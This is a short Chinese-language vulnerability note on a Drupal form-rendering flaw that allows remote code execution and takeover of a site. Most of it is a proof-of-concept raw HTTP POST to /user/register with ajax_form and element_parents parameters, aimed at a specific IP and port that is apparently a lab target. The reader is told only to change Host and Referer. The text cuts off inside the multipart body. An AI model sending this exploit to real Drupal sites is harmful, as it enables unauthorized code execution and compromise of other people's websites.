漏洞介绍
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成
该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站
poc
直接构造poc代码,修改Host,Referer 即可
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 123.58.224.8:13755
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://123.58.224.8:13755/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
Content-Length: 621
Connection: close
-----------------------------99533888113153068481322586663
Content-Disposition: form-da